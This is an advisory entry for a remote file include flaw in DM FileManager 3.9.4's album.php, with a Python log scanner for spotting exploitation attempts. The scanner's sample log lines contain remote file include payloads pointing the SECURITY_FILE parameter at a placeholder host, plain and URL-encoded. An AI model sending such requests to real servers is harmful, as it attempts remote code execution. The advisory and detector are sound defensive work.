vendor: DM FileManager
by: Septemb0x
CVSS: 9.3 HIGH
Remote File Include
CWE: 98
Product Name: DM FileManager
Affected Version From: 3.9.4
Affected Version To: 3.9.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:dutchmonkey:dm_filemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
DM FileManager 3.9.4 Remote File Include Vulnerability
A remote file include vulnerability exists in DM FileManager 3.9.4. It is caused by insufficient sanitization of user-supplied input passed to the 'SECURITY_FILE' parameter of the 'album.php' script. An attacker can exploit it by sending a malicious URL to the vulnerable system; successful exploitation results in arbitrary code execution on that system.
Mitigation:
Upgrade to the latest version of DM FileManager.
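Detection: to review access logs for requests matching the description above, this added example (not part of the original advisory or of DM FileManager) flags 'album.php' requests whose 'SECURITY_FILE' value is a remote reference. The combined log format, the '/dm/' path and every sample line are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Values that point an include parameter outside the local file tree.
REMOTE_VALUE = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect)://|data:|//)', re.I)
# Request line inside a combined-log-format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2009:10:01:02 +0000] "GET /dm/album.php?id=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Mar/2009:10:03:44 +0000] "GET /dm/album.php?SECURITY_FILE=http://example.invalid/x.txt HTTP/1.1" 200 812',
    '203.0.113.9 - - [12/Mar/2009:10:03:51 +0000] "GET /dm/album.php?SECURITY_FILE=%68ttp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 812',
    '203.0.113.5 - - [12/Mar/2009:10:05:10 +0000] "GET /dm/album.php?SECURITY_FILE=security.php HTTP/1.1" 200 5120',
    '203.0.113.8 - - [12/Mar/2009:10:06:30 +0000] "GET /other.php?SECURITY_FILE=http://example.invalid/x.txt HTTP/1.1" 404 0',
]

def suspicious_requests(lines):
    """Return (client_ip, decoded_value) for each album.php request whose
    SECURITY_FILE query parameter is a remote reference."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group(1))
        if not unquote(url.path).lower().endswith('/album.php'):
            continue  # only the script named in the advisory
        # parse_qsl percent-decodes values, so encoded schemes are still seen.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # PHP variable names are case-sensitive: match the exact name.
            if name == 'SECURITY_FILE' and REMOTE_VALUE.search(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == '__main__':
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f'{ip} requested album.php with remote SECURITY_FILE={value!r}')
```

Parameters sent in a POST body do not appear in standard access logs, so a clean result here covers query-string requests only.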